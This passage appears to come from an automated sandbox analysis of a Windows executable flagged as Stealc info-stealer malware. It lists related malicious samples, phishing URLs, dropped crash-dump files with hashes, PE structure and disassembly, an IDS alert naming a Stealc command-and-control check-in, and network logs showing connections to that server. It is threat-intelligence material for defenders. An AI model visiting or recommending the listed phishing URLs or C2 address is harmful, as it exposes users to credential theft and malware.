                                              Setup.exeGet hashmaliciousLummaCBrowse
                                              • 13.107.246.64
                                              fp2e7a.wpc.phicdn.netNdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 192.229.221.95
                                              VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 192.229.221.95
                                              5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                              • 192.229.221.95
                                              https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcrGet hashmaliciousHTMLPhisherBrowse
                                              • 192.229.221.95
                                              file.exeGet hashmaliciousVidarBrowse
                                              • 192.229.221.95
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 192.229.221.95
                                              https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04Get hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.htr.gtdzwq?v=frudxdxrtxfilfrjx.htrd.iwtlt___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpjOGJiNWZiM2U4NjZhMDk1M2Y0MGVjY2U1MDhmYjQ4YTo3OmM4Y2I6MDdlZDdhNDI4N2UyMzc1NGJjZGQ1YjkyOWYyODg2OTI5ZDkyNzU0YTQ2NWI4MzhkYWZlMmM3NjA5ZGMyZGNmMzpoOlQ6VA#YnJhbmRvbi53YW5nQGludGVncmFjb25uZWN0LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                              • 192.229.221.95
                                              https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBFGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              bg.microsoft.map.fastly.netNdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 199.232.210.172
                                              vEcIHT68pU.exeGet hashmaliciousLummaCBrowse
                                              • 199.232.214.172
                                              file.exeGet hashmaliciousVidarBrowse
                                              • 199.232.214.172
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 199.232.214.172
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 199.232.210.172
                                              https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04Get hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              https://protect2.fireeye.com/v1/url?k=31323334-50bba2bf-3132a9b3-4544474f5631-9e1721db7158d01a&q=1&e=fd99754d-b74a-4ce2-bf27-63a41e808f94&u=https%3A%2F%2Fwww.rhris.com%2FEmailEmploymentValidation.cfm%3FEmploymentRefID%3DE84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBFGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              https://eu.pbe.encryption.symantec.com/login.html?msgUserId=682e23d9f715c97c&enterprise=lgas&locale=en_USGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                              • 199.232.210.172
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TNNET-ASTNNetOyMainnetworkFI5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                              • 62.204.41.150
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 62.204.41.150
                                              0h5IfpqflF.exeGet hashmaliciousStealcBrowse
                                              • 62.204.41.159
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 62.204.41.159
                                              552RZ9fPMe.exeGet hashmaliciousStealcBrowse
                                              • 62.204.41.159
                                              vmgon5Zqja.exeGet hashmaliciousStealc, VidarBrowse
                                              • 62.204.41.159
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 62.204.41.159
                                              956d73b7f041.exeGet hashmaliciousStealcBrowse
                                              • 62.204.41.159
                                              InstallSetup.exeGet hashmaliciousStealcBrowse
                                              • 62.204.41.159
                                              ScreenUpdateSync.exeGet hashmaliciousStealc, VidarBrowse
                                              • 62.204.41.159
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              1138de370e523e824bbca92d049a3777file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 13.107.246.64
                                              https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBFGet hashmaliciousUnknownBrowse
                                              • 13.107.246.64
                                              https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                              • 13.107.246.64
                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 13.107.246.64
                                              https://fenster-mark-gmbhsharefile.btn-ebikes.com/Get hashmaliciousUnknownBrowse
                                              • 13.107.246.64
                                              Hscni Remittance_8115919700_16831215.htmlGet hashmaliciousTycoon2FABrowse
                                              • 13.107.246.64
                                              xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                              • 13.107.246.64
                                              High Court Summons Notice.pdfGet hashmaliciousUnknownBrowse
                                              • 13.107.246.64
                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 13.107.246.64
                                              https://pub-a58bcfc58507426ca38ee3be5a258dab.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 13.107.246.64
                                              28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousCredential FlusherBrowse
                                              • 13.107.246.64
                                              VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 13.107.246.64
                                              vEcIHT68pU.exeGet hashmaliciousLummaCBrowse
                                              • 13.107.246.64
                                              5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                              • 13.107.246.64
                                              https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdMGet hashmaliciousHtmlDropperBrowse
                                              • 13.107.246.64
                                              https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcrGet hashmaliciousHTMLPhisherBrowse
                                              • 13.107.246.64
                                              Contract_Agreement_Monday October 2024.pdfGet hashmaliciousUnknownBrowse
                                              • 13.107.246.64
                                              file.exeGet hashmaliciousVidarBrowse
                                              • 13.107.246.64
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 13.107.246.64
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 13.107.246.64
                                              No context
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.6526090891527181
                                              Encrypted:false
                                              SSDEEP:96:G1FCx8Bjr057v1Zs1wy61aAPf5QXIDcQvc6QcEVcw3cE/Wvm+HbHg/5hZAX/d5Ft:6Tjr01Zg0BU/AjhzuiFkZ24IO8Z
                                              MD5:A10B84F5D092B8D44F85BF546D255526
                                              SHA1:AA9FFBEA66E7D517F4C6065AA6363007EB663680
                                              SHA-256:069B8AEC3A24AC7BCC8AF41201411B9DA4AC39831FEE80DE1ED2AFAA2E7EC901
                                              SHA-512:94244869C2C5C2E8124EF9112CD3A069BAC5C1D7F3589C17B5BE5507E785F35C19ECC59EAD950088339BB5F9DB1FEEC3A27E72FBB172D07C92061A764D7C7672
                                              Malicious:true
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.9.3.1.6.5.6.1.4.1.2.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.9.3.1.6.5.9.8.9.1.1.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.e.1.3.1.f.d.-.d.6.6.e.-.4.1.5.8.-.8.7.c.7.-.7.3.0.7.9.5.a.9.5.c.a.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.3.4.e.6.a.2.-.d.3.9.1.-.4.9.9.2.-.b.d.d.2.-.f.3.1.6.a.4.e.0.b.c.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.f.1.3.C.s.1.o.g.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.r.o.q.u.o.t.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.d.0.-.0.0.0.1.-.0.0.1.4.-.2.7.6.1.-.5.9.6.6.d.8.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.d.0.3.f.6.a.1.a.a.4.5.0.5.0.f.7.b.e.5.5.f.8.7.6.f.e.a.2.d.c.0.0.0.0.0.9.0.4.!.0.0.0.0.2.0.3.1.7.7.c.e.2.7.5.3.1.4.0.f.c.2.5.5.3.3.6.5.e.2.9.2.0.0.5.d.3.8.3.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Mon Oct 7 16:46:05 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):34372
                                              Entropy (8bit):1.7302828387451836
                                              Encrypted:false
                                              SSDEEP:192:SNP0sOntGAd0xI3dcmMWbvcJXWNRsgWmX8g:NjtGAKxI3jMWbcX6Rr
                                              MD5:7C25AA9CFE26B9650B1F5E6656542BD6
                                              SHA1:DAA038ACFC2E93309EF593FDD1566D2885F16512
                                              SHA-256:535AE63AED98301152B13B4ED0DA1777AAAF0B5D8448F8A72D51AF8B4FAF1D96
                                              SHA-512:6DAA33C693486F901460DE4A88DE1006820EEF0AA97C79121D6238D03340B381509B7C52B3BBAE97E6008D63EC46C5561C5DF7B7248047A37ED7E695D4530BAD
                                              Malicious:false
                                              Reputation:low
                                              Preview:MDMP..a..... .......M..g........................d...........................T.......8...........T...........P....z......................................................................................................eJ..............GenuineIntel............T...........L..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8330
                                              Entropy (8bit):3.6967309422530445
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJ0jW6G6YEInSU2nvgmfeWgIprq89b4Usfhom:R6lXJOW6G6YE4SU2nvgmfeWg+4Hfb
                                              MD5:1134EF2A7CABF3CB883E3F7774C858E7
                                              SHA1:6EF63CF401B76E21494F78AF2D77BAAC0B150215
                                              SHA-256:1FBD41036E1E2FE949F407E96FD6CB6740B1BCD81292811CC42D23FA3BD0BFE6
                                              SHA-512:16887643157519D1F53DE5E09E58040435F54782FAEBFEB3FEF71CD20B8920EBCED8B22D6EBD6F8DFB1A03F33555DDDF6647E0ADFFBB420A583C5098675858EA
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.5.2.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4678
                                              Entropy (8bit):4.469992287553681
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zsEuJg77aI9qVWpW8VYLYm8M4J02F5xW8+q82BawL2dMd:uIjfEkI7Qk7VDJnxW8RawL2dMd
                                              MD5:3E3EB9824E0436B88E3E484C9008E9F0
                                              SHA1:7D0603FF3EB0CA88A964205BBC301C74F0E8C996
                                              SHA-256:A62FC40CD5902DA614F184B209ACDA2D700477E661443D9FDFF6FC6238C42D45
                                              SHA-512:0F60F8F18E0E3BCC2CBCF63B363DD1534CEA1CA0CB0AE18B2F6906CA2685FB41042CA1A68D42D33709C51C8EB4B8B717FAD7B86EE0DF6C572FDDE845652E4220
                                              Malicious:false
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.422062079740462
                                              Encrypted:false
                                              SSDEEP:6144:XSvfpi6ceLP/9skLmb0OTiWSPHaJG8nAgeMZMMhA2fX4WABlEnND0uhiTw:CvloTiW+EZMM6DFyB03w
                                              MD5:BBFF0F22B1CF9C62DC54880EA592C4B6
                                              SHA1:8211F41CA2C96B4A2530DCF5218F91FB6CAE3294
                                              SHA-256:083A0912577317C11276657088F5EDEF66CE2915622C3F14425632C4837D227F
                                              SHA-512:908D473ECF471CE12853353CE4DF28F06F3646F904A5071BC6AC7D2DF4AB14E305A0C7FC03EAE9A3F382FC2D0F4C3A1C084D5904031838B7E56AC985A3E8812C
                                              Malicious:false
                                              Reputation:low
                                              Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv..f...................................................................................................................................................................................................................................................................................................................................................R........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.6826865703655915
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:1f13Cs1ogc.exe
                                              File size:505'344 bytes
                                              MD5:be961e1299e54c9a50c773db0dc3696c
                                              SHA1:203177ce2753140fc2553365e292005d383e2936
                                              SHA256:5501120627d6aa86b043d6ca51b3bb2dffeb44a8c0cf6f153d6fdf550d76690f
                                              SHA512:bc0bbea65fb54c4a059d3c71c807b2fa5d77ae9bf0902664014d75eb432f4fa752fcb59cd993f54498bc1a28ab044c5d5144b5f250676f9725cce917540e0d43
                                              SSDEEP:12288:VpJlka1IlaV/mfE6NNlu5wchlzbuTKWGoaz9ec14S:VOa1OVw3NiTDaz9ecO
                                              TLSH:FBB4F04175C1C432D873293246F0DA755E7DB9B00A66AEDF63840FBE0F30681DB25AAB
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.9.y.WUy.WUy.WU..TTu.WU..RT..WU..STl.WU..VTz.WUy.VU!.WUilTTm.WUilSTk.WUilRT4.WU1m^Tx.WU1m.Ux.WU1mUTx.WURichy.WU...............
                                              Icon Hash:00928e8e8686b000
                                              Entrypoint:0x406f52
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x67040A64 [Mon Oct 7 16:20:52 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:d10af643340e1121562abe3e6bd5b0e1
                                              Instruction
                                              call 00007F92ECB4CD20h
                                              jmp 00007F92ECB4C28Fh
                                              push ebp
                                              mov ebp, esp
                                              mov eax, dword ptr [ebp+08h]
                                              push esi
                                              mov ecx, dword ptr [eax+3Ch]
                                              add ecx, eax
                                              movzx eax, word ptr [ecx+14h]
                                              lea edx, dword ptr [ecx+18h]
                                              add edx, eax
                                              movzx eax, word ptr [ecx+06h]
                                              imul esi, eax, 28h
                                              add esi, edx
                                              cmp edx, esi
                                              je 00007F92ECB4C42Bh
                                              mov ecx, dword ptr [ebp+0Ch]
                                              cmp ecx, dword ptr [edx+0Ch]
                                              jc 00007F92ECB4C41Ch
                                              mov eax, dword ptr [edx+08h]
                                              add eax, dword ptr [edx+0Ch]
                                              cmp ecx, eax
                                              jc 00007F92ECB4C41Eh
                                              add edx, 28h
                                              cmp edx, esi
                                              jne 00007F92ECB4C3FCh
                                              xor eax, eax
                                              pop esi
                                              pop ebp
                                              ret
                                              mov eax, edx
                                              jmp 00007F92ECB4C40Bh
                                              push esi
                                              call 00007F92ECB4D034h
                                              test eax, eax
                                              je 00007F92ECB4C432h
                                              mov eax, dword ptr fs:[00000018h]
                                              mov esi, 0047B34Ch
                                              mov edx, dword ptr [eax+04h]
                                              jmp 00007F92ECB4C416h
                                              cmp edx, eax
                                              je 00007F92ECB4C422h
                                              xor eax, eax
                                              mov ecx, edx
                                              lock cmpxchg dword ptr [esi], ecx
                                              test eax, eax
                                              jne 00007F92ECB4C402h
                                              xor al, al
                                              pop esi
                                              ret
                                              mov al, 01h
                                              pop esi
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              cmp dword ptr [ebp+08h], 00000000h
                                              jne 00007F92ECB4C419h
                                              mov byte ptr [0047B350h], 00000001h
                                              call 00007F92ECB4C6CAh
                                              call 00007F92ECB4F5E7h
                                              test al, al
                                              jne 00007F92ECB4C416h
                                              xor al, al
                                              pop ebp
                                              ret
                                              call 00007F92ECB58049h
                                              test al, al
                                              jne 00007F92ECB4C41Ch
                                              push 00000000h
                                              call 00007F92ECB4F5EEh
                                              pop ecx
                                              jmp 00007F92ECB4C3FBh
                                              mov al, 01h
                                              pop ebp
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              cmp byte ptr [0047B351h], 00000000h
                                              je 00007F92ECB4C416h
                                              mov al, 01h
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2c6c00x28.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7c0000x3d8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7d0000x1ad4.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x2abc00x1c.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ab000x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x230000x12c.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x210f00x21200957bcb00763b6762ded448431edb3bb1False0.5865713443396227data6.670169912190407IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x230000x9d780x9e0016f1acc49cfaa93114ad2651fe1bc782False0.43517602848101267data4.959108885925861IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x2d0000x4ef780x4e200f2d78f38e2bcb0a2c204cdbdca063f1fFalse0.9899375DOS executable (block device driver \377\377\377\377,32-bit sector-support)7.99065530703881IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x7c0000x3d80x4005584c2fd2a321b3ff4d89d84727643beFalse0.4404296875data3.290569201128903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x7d0000x1ad40x1c0016092792d232aa39e24b762c0f4a37abFalse0.7273995535714286data6.393192590005456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0x7c0580x380dataEnglishUnited States0.46205357142857145
                                              DLLImport
                                              KERNEL32.dllAttachConsole, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-10-07T18:46:07.015168+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970462.204.41.15080TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 7, 2024 18:46:02.671298981 CEST49674443192.168.2.523.1.237.91
                                              Oct 7, 2024 18:46:02.671964884 CEST49675443192.168.2.523.1.237.91
                                              Oct 7, 2024 18:46:02.765072107 CEST49673443192.168.2.523.1.237.91
                                              Oct 7, 2024 18:46:05.663204908 CEST4970480192.168.2.562.204.41.150
                                              Oct 7, 2024 18:46:05.668157101 CEST804970462.204.41.150192.168.2.5
                                              Oct 7, 2024 18:46:05.668245077 CEST4970480192.168.2.562.204.41.150
                                              Oct 7, 2024 18:46:05.668461084 CEST4970480192.168.2.562.204.41.150
                                              Oct 7, 2024 18:46:05.673353910 CEST804970462.204.41.150192.168.2.5
                                              Oct 7, 2024 18:46:06.424277067 CEST804970462.204.41.150192.168.2.5
                                              Oct 7, 2024 18:46:06.424357891 CEST4970480192.168.2.562.204.41.150
                                              Oct 7, 2024 18:46:06.468998909 CEST4970480192.168.2.562.204.41.150
                                              Oct 7, 2024 18:46:06.473977089 CEST804970462.204.41.150192.168.2.5
                                              Oct 7, 2024 18:46:07.014967918 CEST804970462.204.41.150192.168.2.5
                                              Oct 7, 2024 18:46:07.015167952 CEST4970480192.168.2.562.204.41.150
                                              Oct 7, 2024 18:46:08.990940094 CEST4970480192.168.2.562.204.41.150
                                              Oct 7, 2024 18:46:12.280661106 CEST49674443192.168.2.523.1.237.91
